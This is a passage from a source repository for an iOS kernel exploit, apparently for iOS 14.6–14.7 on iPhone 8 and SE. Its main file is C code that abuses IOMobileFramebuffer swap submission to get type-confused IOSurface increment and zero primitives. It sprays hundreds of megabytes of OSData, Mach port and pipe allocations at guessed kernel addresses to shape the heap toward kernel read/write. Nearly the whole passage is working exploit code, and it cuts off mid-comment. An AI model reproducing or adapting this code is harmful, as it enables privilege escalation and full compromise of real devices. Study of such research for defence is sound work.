├── IOMobileFramebufferUserClient.c ├── IOMobileFramebufferUserClient.h ├── LICENSE ├── Makefile ├── README.md ├── alloc_averager.py ├── array.c ├── array.h ├── ent.xml ├── iokit.h ├── kernel_hooks.c ├── kernel_hooks.h └── xnuspy_ctl.h /IOMobileFramebufferUserClient.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #include "array.h" 15 | #include "iokit.h" 16 | 17 | #ifdef SAMPLING_MEMORY 18 | #include "kernel_hooks.h" 19 | #include "xnuspy_ctl.h" 20 | #endif 21 | 22 | /* For iPhone 8, 14.6, 30 seconds after boot */ 23 | #define GUESSED_OSDATA_BUFFER_PTR (0xffffffe8dd594000uLL) 24 | 25 | /* For iPhone SE (2016), 14.7, 30 seconds after boot */ 26 | /* #define GUESSED_OSDATA_BUFFER_PTR (0xfffffff9942d0000uLL) */ 27 | 28 | struct ool_msg { 29 | mach_msg_header_t hdr; 30 | mach_msg_body_t body; 31 | mach_msg_ool_ports_descriptor_t ool_ports_desc; 32 | }; 33 | 34 | static mach_port_t kalloc(size_t len){ 35 | mach_port_t recv_port; 36 | kern_return_t kret = mach_port_allocate(mach_task_self(), 37 | MACH_PORT_RIGHT_RECEIVE, &recv_port); 38 | 39 | if(kret){ 40 | printf("%s: mach_port_allocate %s\n", __func__, mach_error_string(kret)); 41 | return MACH_PORT_NULL; 42 | } 43 | 44 | mach_port_limits_t limits = {0}; 45 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 46 | mach_msg_type_number_t cnt = MACH_PORT_LIMITS_INFO_COUNT; 47 | mach_port_set_attributes(mach_task_self(), recv_port, MACH_PORT_LIMITS_INFO, 48 | (mach_port_info_t)&limits, cnt); 49 | 50 | size_t port_count = len / 8; 51 | 52 | /* calloc for MACH_PORT_NULL */ 53 | mach_port_t *ports = calloc(port_count, sizeof(mach_port_t)); 54 | 55 | struct ool_msg oolmsg = {0}; 56 | oolmsg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | 57 | MACH_MSGH_BITS_COMPLEX; 58 | oolmsg.hdr.msgh_size = sizeof(struct ool_msg); 59 | oolmsg.hdr.msgh_remote_port = recv_port; 60 | oolmsg.hdr.msgh_local_port = MACH_PORT_NULL; 61 | oolmsg.hdr.msgh_id = 0xaabbccdd; 62 | oolmsg.body.msgh_descriptor_count = 1; 63 | 64 | mach_msg_ool_ports_descriptor_t *opd = &oolmsg.ool_ports_desc; 65 | 66 | opd->address = ports; 67 | opd->count = port_count; 68 | opd->deallocate = 0; 69 | opd->copy = MACH_MSG_PHYSICAL_COPY; 70 | opd->disposition = MACH_MSG_TYPE_MAKE_SEND; 71 | opd->type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 72 | 73 | kret = mach_msg(&oolmsg.hdr, MACH_SEND_MSG, sizeof(oolmsg), 0, 74 | MACH_PORT_NULL, 0, MACH_PORT_NULL); 75 | 76 | if(kret){ 77 | printf("%s: mach_msg %s\n", __func__, mach_error_string(kret)); 78 | return MACH_PORT_NULL; 79 | } 80 | 81 | return recv_port; 82 | } 83 | 84 | static io_connect_t IOMobileFramebufferUserClient_uc(void){ 85 | kern_return_t kret = KERN_SUCCESS; 86 | io_connect_t IOMobileFramebufferUserClient_user_client = IO_OBJECT_NULL; 87 | const char *name = "IOMobileFramebuffer"; 88 | 89 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, 90 | IOServiceMatching(name)); 91 | 92 | if(!service){ 93 | printf("%s: IOServiceGetMatchingService returned NULL\n", __func__); 94 | return IO_OBJECT_NULL; 95 | } 96 | 97 | int type = 0; 98 | kret = IOServiceOpen(service, mach_task_self(), type, 99 | &IOMobileFramebufferUserClient_user_client); 100 | 101 | if(kret){ 102 | printf("%s: IOServiceOpen returned %s\n", __func__, 103 | mach_error_string(kret)); 104 | return IO_OBJECT_NULL; 105 | } 106 | 107 | return IOMobileFramebufferUserClient_user_client; 108 | } 109 | 110 | static io_connect_t IOSurfaceRootUserClient_uc(void){ 111 | kern_return_t kret = KERN_SUCCESS; 112 | io_connect_t IOSurfaceRootUserClient_user_client = IO_OBJECT_NULL; 113 | const char *name = "IOSurfaceRoot"; 114 | 115 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, 116 | IOServiceMatching(name)); 117 | 118 | if(!service){ 119 | printf("%s: IOServiceGetMatchingService returned NULL\n", __func__); 120 | return IO_OBJECT_NULL; 121 | } 122 | 123 | int type = 0; 124 | kret = IOServiceOpen(service, mach_task_self(), type, 125 | &IOSurfaceRootUserClient_user_client); 126 | 127 | if(kret){ 128 | printf("%s: IOServiceOpen returned %s\n", __func__, 129 | mach_error_string(kret)); 130 | return IO_OBJECT_NULL; 131 | } 132 | 133 | return IOSurfaceRootUserClient_user_client; 134 | } 135 | 136 | static int create_surface(io_connect_t uc){ 137 | /* Thanks @bazad */ 138 | struct _IOSurfaceFastCreateArgs { 139 | uint64_t address; 140 | uint32_t width; 141 | uint32_t height; 142 | uint32_t pixel_format; 143 | uint32_t bytes_per_element; 144 | uint32_t bytes_per_row; 145 | uint32_t alloc_size; 146 | }; 147 | 148 | struct IOSurfaceLockResult { 149 | uint8_t _pad1[0x18]; 150 | uint32_t surface_id; 151 | uint8_t _pad2[0xf60-0x18-0x4]; 152 | }; 153 | 154 | struct _IOSurfaceFastCreateArgs create_args = {0}; 155 | create_args.width = 100; 156 | create_args.height = 100; 157 | /* below works */ 158 | create_args.pixel_format = 0x42475241; 159 | create_args.alloc_size = 0; 160 | 161 | struct IOSurfaceLockResult lock_result; 162 | size_t lock_result_size = sizeof(lock_result); 163 | 164 | kern_return_t kret = IOConnectCallMethod(uc, 6, NULL, 0, &create_args, 165 | sizeof(create_args), NULL, NULL, &lock_result, &lock_result_size); 166 | 167 | if(kret) 168 | return -1; 169 | 170 | return lock_result.surface_id; 171 | } 172 | 173 | static int create_swap(io_connect_t uc){ 174 | uint64_t swap_id; 175 | uint32_t cnt = 1; 176 | 177 | kern_return_t kret = IOConnectCallScalarMethod(uc, 4, NULL, 0, 178 | &swap_id, &cnt); 179 | 180 | if(kret) 181 | return -1; 182 | 183 | return swap_id; 184 | } 185 | 186 | static bool cancel_swap(io_connect_t uc, int swap_id){ 187 | uint64_t in = (uint64_t)swap_id; 188 | 189 | kern_return_t kret = IOConnectCallScalarMethod(uc, 52, &in, 190 | 1, NULL, NULL); 191 | 192 | if(kret){ 193 | printf("%s: s_swap_cancel failed: %s\n", __func__, 194 | mach_error_string(kret)); 195 | return false; 196 | } 197 | 198 | return true; 199 | } 200 | 201 | static bool submit_stagen_swap(io_connect_t uc, 202 | uint64_t iosurfaceroot_kaddr, uint64_t recursive_lock_kaddr, 203 | uint64_t plus_c0_kptr, uint64_t device_cache_kaddr, 204 | int *swap_id_out){ 205 | static uint64_t a = 0; 206 | kern_return_t kret = KERN_SUCCESS; 207 | 208 | if(!a){ 209 | kret = vm_allocate(mach_task_self(), (vm_address_t *)&a, 0x4000, 1); 210 | 211 | if(kret){ 212 | printf("%s: vm_allocate: %s\n", __func__, 213 | mach_error_string(kret)); 214 | *swap_id_out = 0; 215 | return false; 216 | } 217 | } 218 | 219 | int swap_id = create_swap(uc); 220 | 221 | if(swap_id == -1){ 222 | printf("%s: failed to make swap\n", __func__); 223 | *swap_id_out = 0; 224 | return false; 225 | } 226 | 227 | uint8_t swap_submit_in[0x280]; 228 | memset(swap_submit_in, 0, sizeof(swap_submit_in)); 229 | 230 | /* surface+0x28: IOSurfaceRoot, must point to something valid 231 | * for the 10-byte zero primitive */ 232 | *(uint64_t *)(swap_submit_in + 0x67) = iosurfaceroot_kaddr; 233 | 234 | /* surface+0x38: must be non-NULL so our swap is registered 235 | * in the surface array */ 236 | *(uint64_t *)(swap_submit_in + 0x77) = 0x4141414141414141; 237 | 238 | /* surface+0x40: must be the same as *(device_cache+0x38) for the 239 | * 10-byte zero primitive we have */ 240 | *(uint64_t *)(swap_submit_in + 0x97) = device_cache_kaddr + 0x38; 241 | 242 | /* surface+0x48: IOSurfaceDeviceCache pointer */ 243 | *(uint64_t *)(swap_submit_in + 0x9f) = device_cache_kaddr; 244 | 245 | /* surface+0x80: IORecursiveLock */ 246 | *(uint64_t *)(swap_submit_in + 0x11b) = recursive_lock_kaddr; 247 | 248 | /* surface+0xb0: size passed to IOMalloc_external * 8 249 | * 250 | * Make this large so we bail before the phone tries to do 251 | * a virtual method call with a pointer we can't guess 252 | * inside IOSurfaceClient::init */ 253 | *(uint32_t *)(swap_submit_in + 0x14b) = 0x7fffffff; 254 | 255 | /* surface+0xc0: kernel pointer, can do an arbitrary decrement/ 256 | * increment with *(surface+0xc0)+0x14 */ 257 | *(uint64_t *)(swap_submit_in + 0x15b) = plus_c0_kptr; 258 | 259 | *(uint64_t *)(swap_submit_in + 0x38) = a; 260 | *(uint32_t *)(swap_submit_in + 0x40) = swap_id; 261 | 262 | /* Enable all layers so we can control more of the 263 | * type confused IOSurface */ 264 | *(uint32_t *)(swap_submit_in + 0xc8) = (1 << 2) | (1 << 1) | (1 << 0); 265 | 266 | /* Prevent this swap from being dropped inside swap_start_gated 267 | * (will be considered as a "no-op swap" otherwise) */ 268 | *(uint32_t *)(swap_submit_in + 0xcc) = 0x42424242; 269 | 270 | /* This must not be 0, 2, 9, 12, or 13, otherwise the most recently 271 | * submitted swap will not show up at UnifiedPipeline+0xb18 */ 272 | *(uint32_t *)(swap_submit_in + 0xf4) = 0x100; 273 | 274 | /* Set all to 4 so the above is recorded in the swap object */ 275 | *(uint32_t *)(swap_submit_in + 0x100) = 4; 276 | *(uint32_t *)(swap_submit_in + 0x104) = 4; 277 | *(uint32_t *)(swap_submit_in + 0x108) = 4; 278 | 279 | /* Shared client id */ 280 | *(uint8_t *)(swap_submit_in + 0x157) = 0; 281 | *(uint8_t *)(swap_submit_in + 0x158) = 0; 282 | 283 | kret = IOConnectCallStructMethod(uc, 5, swap_submit_in, 284 | sizeof(swap_submit_in), NULL, NULL); 285 | 286 | if(kret){ 287 | printf("%s: swap_submit: %s\n", __func__, mach_error_string(kret)); 288 | *swap_id_out = 0; 289 | return false; 290 | } 291 | 292 | *swap_id_out = swap_id; 293 | 294 | return true; 295 | } 296 | 297 | /* Keep track of the ports that external method 83 produces so we 298 | * can clean them up after kernel read/write is obtained */ 299 | static struct array *g_increment32_n_ports = NULL; 300 | 301 | static bool increment32_n(uint64_t kaddr, uint32_t times){ 302 | static io_connect_t iomfbuc = IO_OBJECT_NULL; 303 | 304 | if(!iomfbuc){ 305 | iomfbuc = IOMobileFramebufferUserClient_uc(); 306 | 307 | if(!iomfbuc){ 308 | printf("%s: failed making iomfb user client\n", __func__); 309 | return false; 310 | } 311 | } 312 | 313 | if(!g_increment32_n_ports){ 314 | g_increment32_n_ports = array_new(); 315 | 316 | if(!g_increment32_n_ports){ 317 | printf("%s: failed to allocate array for ports\n", __func__); 318 | return false; 319 | } 320 | } 321 | 322 | int swap_id; 323 | 324 | /* Using IOSurface::increment_use_count, this alone is enough to 325 | * call it */ 326 | if(!submit_stagen_swap(iomfbuc, 0, 0, kaddr - 0x14, 0, &swap_id)) 327 | return false; 328 | 329 | for(uint32_t i=0; i 0; i += 8){ 353 | ret += (val % 255) << i; 354 | val /= 255; 355 | } 356 | 357 | return ret + 0x01010101; 358 | } 359 | 360 | struct set_value_spray { 361 | uint32_t surface_id; 362 | uint32_t pad; 363 | 364 | /* Serialized XML */ 365 | uint32_t set_value_data[7]; 366 | 367 | /* OSData spray data */ 368 | uint8_t osdata_spray[]; 369 | }; 370 | 371 | static uint32_t g_cur_osdata_spray_key = 0; 372 | static struct set_value_spray *g_spray_data_one_page = NULL; 373 | static struct set_value_spray *g_spray_data_two_pages = NULL; 374 | static struct set_value_spray *g_spray_data_three_pages = NULL; 375 | static struct set_value_spray *g_spray_data_four_pages = NULL; 376 | static uint8_t *g_spray_junk_buf_one_page = NULL; 377 | static uint8_t *g_spray_junk_buf_two_pages = NULL; 378 | static uint8_t *g_spray_junk_buf_three_pages = NULL; 379 | static uint8_t *g_spray_junk_buf_four_pages = NULL; 380 | static bool g_osdata_spray_inited = false; 381 | 382 | static void osdata_spray_init(void){ 383 | g_spray_data_one_page = malloc(sizeof(struct set_value_spray) + 0x4000); 384 | 385 | if(!g_spray_data_one_page) 386 | return; 387 | 388 | g_spray_data_two_pages = malloc(sizeof(struct set_value_spray) + 0x8000); 389 | 390 | if(!g_spray_data_two_pages) 391 | return; 392 | 393 | g_spray_data_three_pages = malloc(sizeof(struct set_value_spray) + 0xc000); 394 | 395 | if(!g_spray_data_three_pages) 396 | return; 397 | 398 | g_spray_data_four_pages = malloc(sizeof(struct set_value_spray) + 0x10000); 399 | 400 | if(!g_spray_data_four_pages) 401 | return; 402 | 403 | g_spray_junk_buf_one_page = malloc(0x4000); 404 | 405 | if(!g_spray_junk_buf_one_page) 406 | return; 407 | 408 | g_spray_junk_buf_two_pages = malloc(0x8000); 409 | 410 | if(!g_spray_junk_buf_two_pages) 411 | return; 412 | 413 | g_spray_junk_buf_three_pages = malloc(0xc000); 414 | 415 | if(!g_spray_junk_buf_three_pages) 416 | return; 417 | 418 | g_spray_junk_buf_four_pages = malloc(0x10000); 419 | 420 | if(!g_spray_junk_buf_four_pages) 421 | return; 422 | 423 | memset(g_spray_junk_buf_one_page, '1', 0x4000); 424 | memset(g_spray_junk_buf_two_pages, '2', 0x8000); 425 | memset(g_spray_junk_buf_three_pages, '3', 0xc000); 426 | memset(g_spray_junk_buf_four_pages, '4', 0x10000); 427 | 428 | g_osdata_spray_inited = true; 429 | } 430 | 431 | static bool osdata_spray_free(io_connect_t iosruc, int surface_id, 432 | uint32_t spray_key){ 433 | uint64_t delete_in[] = { (uint64_t)surface_id, spray_key, 0 }; 434 | 435 | uint8_t delete_out[4]; 436 | size_t delete_outcnt = sizeof(delete_out); 437 | 438 | kern_return_t kret = IOConnectCallStructMethod(iosruc, 11, 439 | delete_in, sizeof(delete_in), delete_out, &delete_outcnt); 440 | 441 | if(kret){ 442 | printf("%s: s_delete_value failed for key %#x: %s\n", __func__, 443 | spray_key, mach_error_string(kret)); 444 | return false; 445 | } 446 | 447 | return true; 448 | } 449 | 450 | static bool osdata_spray_internal(io_connect_t iosruc, 451 | int surface_id, uint32_t *keyp, uint8_t *spray_data, 452 | size_t spray_sz, struct set_value_spray *spray_buf){ 453 | size_t aligned_spray_sz = spray_sz; 454 | 455 | if(spray_sz & 0x3fffuLL) 456 | aligned_spray_sz = (spray_sz + 0x4000) & ~(0x3fffuLL); 457 | 458 | uint32_t cur_spray_key = transpose(g_cur_osdata_spray_key); 459 | 460 | spray_buf->surface_id = surface_id; 461 | spray_buf->pad = 0; 462 | 463 | uint32_t *set_value_data = spray_buf->set_value_data; 464 | 465 | *set_value_data++ = kOSSerializeBinarySignature; 466 | *set_value_data++ = kOSSerializeEndCollection | kOSSerializeArray | 1; 467 | *set_value_data++ = kOSSerializeEndCollection | kOSSerializeDictionary | 1; 468 | *set_value_data++ = kOSSerializeSymbol | 5; 469 | *set_value_data++ = cur_spray_key; 470 | *set_value_data++ = 0; 471 | *set_value_data++ = kOSSerializeEndCollection | kOSSerializeData | aligned_spray_sz; 472 | 473 | memcpy(spray_buf->osdata_spray, spray_data, spray_sz); 474 | 475 | uint32_t out = 0; 476 | size_t outsz = sizeof(out); 477 | 478 | kern_return_t kret = IOConnectCallStructMethod(iosruc, 9, spray_buf, 479 | sizeof(struct set_value_spray) + aligned_spray_sz, &out, &outsz); 480 | 481 | if(kret){ 482 | printf("%s: s_set_value failed: %s\n", __func__, 483 | mach_error_string(kret)); 484 | return false; 485 | } 486 | 487 | *keyp = cur_spray_key; 488 | 489 | g_cur_osdata_spray_key++; 490 | 491 | return true; 492 | } 493 | 494 | static bool osdata_junk_spray(io_connect_t iosruc, int surface_id, 495 | size_t sz, uint32_t *keyp){ 496 | if(!g_osdata_spray_inited){ 497 | osdata_spray_init(); 498 | 499 | if(!g_osdata_spray_inited){ 500 | printf("%s: failed to init osdata spray globals\n", __func__); 501 | return false; 502 | } 503 | } 504 | 505 | struct set_value_spray *spray_buf; 506 | uint8_t *buf; 507 | 508 | if(sz <= 0x4000){ 509 | spray_buf = g_spray_data_one_page; 510 | buf = g_spray_junk_buf_one_page; 511 | } 512 | else if(sz <= 0x8000){ 513 | spray_buf = g_spray_data_two_pages; 514 | buf = g_spray_junk_buf_two_pages; 515 | } 516 | else if(sz <= 0xc000){ 517 | spray_buf = g_spray_data_three_pages; 518 | buf = g_spray_junk_buf_three_pages; 519 | } 520 | else if(sz <= 0x10000){ 521 | spray_buf = g_spray_data_four_pages; 522 | buf = g_spray_junk_buf_four_pages; 523 | } 524 | else{ 525 | printf("%s: unsupported size %#zx\n", __func__, sz); 526 | return false; 527 | } 528 | 529 | return osdata_spray_internal(iosruc, surface_id, keyp, buf, 530 | sz, spray_buf); 531 | } 532 | 533 | static bool osdata_spray(io_connect_t iosruc, int surface_id, 534 | uint8_t *data, size_t sz, uint32_t *keyp){ 535 | if(!g_osdata_spray_inited){ 536 | osdata_spray_init(); 537 | 538 | if(!g_osdata_spray_inited){ 539 | printf("%s: failed to init osdata spray globals\n", __func__); 540 | return false; 541 | } 542 | } 543 | 544 | struct set_value_spray *spray_buf; 545 | 546 | if(sz <= 0x4000) 547 | spray_buf = g_spray_data_one_page; 548 | else if(sz <= 0x8000) 549 | spray_buf = g_spray_data_two_pages; 550 | else if(sz <= 0xc000) 551 | spray_buf = g_spray_data_three_pages; 552 | else if(sz <= 0x10000) 553 | spray_buf = g_spray_data_four_pages; 554 | else{ 555 | printf("%s: unsupported size %#zx\n", __func__, sz); 556 | return false; 557 | } 558 | 559 | return osdata_spray_internal(iosruc, surface_id, keyp, data, 560 | sz, spray_buf); 561 | } 562 | 563 | static int ptrcmp(const void *_a, const void *_b){ 564 | const uintptr_t a = *(uintptr_t *)_a; 565 | const uintptr_t b = *(uintptr_t *)_b; 566 | 567 | if(a < b) 568 | return -1; 569 | else if(a == b) 570 | return 0; 571 | else 572 | return 1; 573 | } 574 | 575 | struct pipe_hole_filler { 576 | int rfd, wfd; 577 | uint64_t inferred_pipebuf_kva; 578 | }; 579 | 580 | struct iosruc_hole_filler { 581 | io_connect_t iosruc; 582 | uint64_t inferred_client_array_kva; 583 | struct array *surface_ids; 584 | }; 585 | 586 | #ifdef SAMPLING_MEMORY 587 | extern void *g_osdata_kaddrs[8000]; 588 | extern uint64_t g_osdata_kaddrs_idx; 589 | extern bool g_record_osdata_kaddrs; 590 | 591 | static void sample_kernel_map(void){ 592 | struct array *osdata_kaddrs = array_new(); 593 | 594 | /* Allocations should be contiguous after the 1000th one */ 595 | for(int i=1000; ilen; i++){ 604 | void *kptr = osdata_kaddrs->items[i]; 605 | 606 | if(i == 0) 607 | puts(""); 608 | else{ 609 | uint64_t before = (uint64_t)osdata_kaddrs->items[i-1]; 610 | uint64_t dist = (uint64_t)kptr - before; 611 | 612 | dists[i] = dist; 613 | 614 | if(dist != 0x10000){ 615 | printf("%s: WARNING: %p [%#llx bytes from behind]\n", 616 | __func__, kptr, dist); 617 | } 618 | } 619 | } 620 | 621 | printf("%s: to add to alloc_averager.py:\n", __func__); 622 | 623 | void *last = osdata_kaddrs->items[osdata_kaddrs->len-1]; 624 | 625 | printf("[%p, %p],\n", osdata_kaddrs->items[0], 626 | (void *)((uintptr_t)last + 0x100000 - 0x4000)); 627 | } 628 | 629 | static bool install_kernel_memory_allocate_hook(void){ 630 | long SYS_xnuspy_ctl; 631 | size_t oldlen = sizeof(long); 632 | int res = sysctlbyname("kern.xnuspy_ctl_callnum", &SYS_xnuspy_ctl, 633 | &oldlen, NULL, 0); 634 | 635 | if(res == -1){ 636 | printf("sysctlbyname with kern.xnuspy_ctl_callnum failed: %s\n", 637 | strerror(errno)); 638 | return false; 639 | } 640 | 641 | res = syscall(SYS_xnuspy_ctl, XNUSPY_CHECK_IF_PATCHED, 0, 0, 0); 642 | 643 | if(res != 999){ 644 | printf("xnuspy_ctl isn't present?\n"); 645 | return false; 646 | } 647 | 648 | extern uint64_t kernel_slide; 649 | res = syscall(SYS_xnuspy_ctl, XNUSPY_CACHE_READ, KERNEL_SLIDE, 650 | &kernel_slide, 0, 0); 651 | 652 | if(res){ 653 | printf("failed reading kernel slide from xnuspy cache\n"); 654 | return false; 655 | } 656 | 657 | /* iPhone 8, 14.6 */ 658 | /* uint64_t kma = 0xfffffff007b2e66c; */ 659 | 660 | /* iPhone SE (2016), 14.7 */ 661 | uint64_t kma = 0xfffffff0071f1384; 662 | 663 | res = syscall(SYS_xnuspy_ctl, XNUSPY_INSTALL_HOOK, 664 | kma, _kernel_memory_allocate, &kernel_memory_allocate); 665 | 666 | if(res) 667 | return false; 668 | 669 | return true; 670 | } 671 | #endif 672 | 673 | static bool exploit_stage1(struct array **iosruc_hole_fillersp, 674 | struct array **pipe_hole_fillersp, uint64_t *anchor_alloc_kaddrp){ 675 | kern_return_t kret = KERN_SUCCESS; 676 | 677 | /* Shape the kernel virtual address space. 678 | * 1. Fill up the kalloc map */ 679 | 680 | struct array *kalloc_map_filler_recvs = array_new(); 681 | 682 | for(int i=0; i<2000; i++){ 683 | mach_port_t r = kalloc(0x10000); 684 | 685 | if(!r){ 686 | printf("%s: failed kalloc map filler recv %d\n", __func__, i); 687 | break; 688 | } 689 | 690 | array_insert(kalloc_map_filler_recvs, (void *)(uintptr_t)r); 691 | } 692 | 693 | io_connect_t osdata_spray_iosruc = IOSurfaceRootUserClient_uc(); 694 | 695 | if(!osdata_spray_iosruc){ 696 | printf("%s: failed making IOSurfaceRootUserClient?\n", __func__); 697 | return false; 698 | } 699 | 700 | int osdata_spray_surface = create_surface(osdata_spray_iosruc); 701 | 702 | if(osdata_spray_surface == -1){ 703 | printf("%s: failed to create spray IOSurface\n", __func__); 704 | return false; 705 | } 706 | 707 | struct array *iosruc_hole_fillers = array_new(); 708 | 709 | /* Free 16mb to the left of the anchor alloc */ 710 | const uint64_t anchor_alloc_free_mbs = 16; 711 | const uint64_t anchor_alloc_free_bytes = 0x100000 * anchor_alloc_free_mbs; 712 | const uint32_t spray_sz = 0x10000; 713 | 714 | /* How many 0x10000-byte holes we create to the left of the 715 | * anchor alloc */ 716 | uint32_t nholes_left = anchor_alloc_free_bytes / spray_sz; 717 | 718 | for(int i=0; i<(nholes_left + 20) / 2; i++){ 719 | struct iosruc_hole_filler *ihf = malloc(sizeof(*ihf)); 720 | 721 | io_connect_t uc = IOSurfaceRootUserClient_uc(); 722 | 723 | if(!uc){ 724 | printf("%s: could not make hole filler iosruc @ %d\n", 725 | __func__, i); 726 | return false; 727 | } 728 | 729 | ihf->iosruc = uc; 730 | ihf->inferred_client_array_kva = 0; 731 | ihf->surface_ids = array_new(); 732 | 733 | array_insert(iosruc_hole_fillers, ihf); 734 | } 735 | 736 | /* We'll also be filling holes with 0x10000-byte pipe buffers later */ 737 | struct array *pipe_hole_fillers = array_new(); 738 | 739 | for(int i=0; i<(nholes_left + 20) / 2; i++){ 740 | struct pipe_hole_filler *phf = malloc(sizeof(*phf)); 741 | int p[2]; 742 | 743 | if(pipe(p) == -1){ 744 | printf("%s: pipe call %d failed: %s\n", __func__, i, 745 | strerror(errno)); 746 | return false; 747 | } 748 | 749 | phf->rfd = p[0]; 750 | phf->wfd = p[1]; 751 | phf->inferred_pipebuf_kva = 0; 752 | 753 | array_insert(pipe_hole_fillers, phf); 754 | } 755 | 756 | /* Prep for future kernel map IOSurfaceClient arrays: 757 | * This will set the surface client array capacity for the provider to 758 | * all the iosruc's, which will make just one IOSurfaceClient allocation 759 | * cause a kernel map allocation */ 760 | struct iosruc_hole_filler *ihf0 = iosruc_hole_fillers->items[0]; 761 | int nsurfaces = 4095; 762 | int *surfaces = malloc(sizeof(int) * nsurfaces); 763 | 764 | for(int k=0; kiosruc); 766 | 767 | if(!surfaces[k]){ 768 | printf("%s: could not make surface for hole filler 0\n", __func__); 769 | return false; 770 | } 771 | } 772 | 773 | /* Free all the surfaces except one so we can create new 774 | * surfaces later */ 775 | for(int k=0; kiosruc, 1, &surface, 779 | 1, NULL, NULL); 780 | 781 | if(kret){ 782 | printf("%s: s_release_surface failed: %s\n", __func__, 783 | mach_error_string(kret)); 784 | return false; 785 | } 786 | } 787 | 788 | array_insert(ihf0->surface_ids, (void *)(uintptr_t)surfaces[nsurfaces-1]); 789 | 790 | free(surfaces); 791 | surfaces = NULL; 792 | 793 | /* 2. Spray 500 MB into the kernel map via OSData */ 794 | struct set_value_spray { 795 | uint32_t surface_id; 796 | uint32_t pad; 797 | 798 | /* Serialized XML */ 799 | uint32_t set_value_data[7]; 800 | 801 | /* OSData spray data */ 802 | uint8_t osdata_spray[]; 803 | }; 804 | 805 | const uint32_t mbs = 500; 806 | const size_t total_spray = 0x100000 * mbs; 807 | const uint32_t nsprays = total_spray / spray_sz; 808 | 809 | struct array *osdata_spray_keys = array_new(); 810 | uint8_t *osdata_spray_buf = malloc(spray_sz); 811 | 812 | #ifdef SAMPLING_MEMORY 813 | if(!install_kernel_memory_allocate_hook()) 814 | return false; 815 | 816 | g_record_osdata_kaddrs = true; 817 | #endif 818 | 819 | uint32_t osdata_spray_buf_constant = 0x12345678; 820 | 821 | /* Record the page number as well as the index into osdata_spray_keys */ 822 | for(int i=0; ilen; i++){ 875 | uint32_t key = (uint32_t)(uintptr_t)osdata_spray_keys->items[i]; 876 | 877 | uint32_t get_value_input[4]; 878 | memset(get_value_input, 0, sizeof(get_value_input)); 879 | 880 | get_value_input[0] = osdata_spray_surface; 881 | get_value_input[2] = key; 882 | 883 | size_t readback_buf_sz = 0x10 + spray_sz; 884 | 885 | kret = IOConnectCallStructMethod(osdata_spray_iosruc, 10, 886 | get_value_input, sizeof(get_value_input), readback_buf, 887 | &readback_buf_sz); 888 | 889 | if(kret){ 890 | printf("%s: failed to read back OSData buffer for key %#x: %s\n", 891 | __func__, key, mach_error_string(kret)); 892 | return false; 893 | } 894 | 895 | uint8_t *readback_buf_orig = readback_buf; 896 | 897 | readback_buf += 0x10; 898 | 899 | for(int k=0; k<4; k++){ 900 | uint32_t constant = *(uint32_t *)readback_buf; 901 | 902 | if(constant != osdata_spray_buf_constant){ 903 | uint32_t pagenum = *(uint32_t *)(readback_buf + 0x4); 904 | uint32_t osdata_spray_key_idx = *(uint32_t *)(readback_buf + 0x8); 905 | 906 | printf("%s: pagenum %d keyidx %d\n", __func__,pagenum, 907 | osdata_spray_key_idx); 908 | 909 | anchor_alloc = osdata_spray_key_idx; 910 | anchor_alloc_key = (uint32_t)(uintptr_t)osdata_spray_keys->items[anchor_alloc]; 911 | anchor_alloc_kaddr -= (pagenum * 0x4000); 912 | 913 | break; 914 | } 915 | 916 | readback_buf += 0x4000; 917 | } 918 | 919 | if(anchor_alloc != -1){ 920 | printf("%s: found OSData buffer for key %#x at %#lx\n", 921 | __func__, anchor_alloc_key, anchor_alloc_kaddr); 922 | break; 923 | } 924 | 925 | readback_buf = readback_buf_orig; 926 | memset(readback_buf, 0, spray_sz); 927 | } 928 | 929 | if(anchor_alloc == -1){ 930 | printf("%s: our guess was wrong, we may panic\n", __func__); 931 | return false; 932 | } 933 | 934 | /* Free 16 MB worth of allocations to the left of the anchor alloc */ 935 | for(int i=anchor_alloc-nholes_left; iitems[i]; 937 | 938 | if(!osdata_spray_free(osdata_spray_iosruc, osdata_spray_surface, key)){ 939 | printf("%s: left: failed freeing data for key %#x\n", 940 | __func__, key); 941 | return false; 942 | } 943 | 944 | osdata_spray_keys->items[i] = (void *)-1; 945 | } 946 | 947 | uint64_t cur_left_hole_kva = anchor_alloc_kaddr - (spray_sz * nholes_left); 948 | 949 | /* We try and get a layout like this 950 | * [IOSurfaceClient array][pipe buffer][anchor alloc] 951 | * or like this 952 | * [pipe buffer][IOSurfaceClient array][anchor alloc] 953 | * because each time we use the 32-bit increment, a Mach port is 954 | * created, and ports are not an unlimited resource. Both these 955 | * arrays have the same length so this is safe */ 956 | for(int i=0; ilen; i++){ 957 | bool last_ihf = (i == iosruc_hole_fillers->len - 1); 958 | 959 | /* Exclude the first iosruc hole filler, because its IOSurfaceClient 960 | * array was allocated way before */ 961 | struct iosruc_hole_filler *ihf = NULL; 962 | 963 | if(!last_ihf) 964 | ihf = iosruc_hole_fillers->items[i+1]; 965 | 966 | struct pipe_hole_filler *phf = pipe_hole_fillers->items[i]; 967 | 968 | /* We're betting on the KVA space being laid out as described 969 | * above, fingers crossed... */ 970 | if(!last_ihf) 971 | ihf->inferred_client_array_kva = cur_left_hole_kva; 972 | 973 | phf->inferred_pipebuf_kva = cur_left_hole_kva + spray_sz; 974 | 975 | cur_left_hole_kva += (spray_sz * 2); 976 | 977 | uint8_t contents[0x10000]; 978 | memset(contents, i, sizeof(contents)); 979 | 980 | int surface_id = 0; 981 | 982 | if(!last_ihf) 983 | surface_id = create_surface(ihf->iosruc); 984 | 985 | int write_res = write(phf->wfd, contents, sizeof(contents)); 986 | 987 | if(!last_ihf && surface_id == -1){ 988 | printf("%s: failed to create IOSurfaceClient array for ihf %d\n", 989 | __func__, i); 990 | return false; 991 | } 992 | 993 | if(write_res == -1){ 994 | printf("%s: write failed for phf %d\n", __func__, i); 995 | return false; 996 | } 997 | 998 | if(!last_ihf) 999 | array_insert(ihf->surface_ids, (void *)(uintptr_t)surface_id); 1000 | } 1001 | 1002 | /* There's a good chance that the IOSurfaceRootUserClient's 1003 | * surface client array in the middle of this array falls in 1004 | * the middle of the holes we reclaimed. Only spray surfaces here 1005 | * so when we do stage2, the leaked 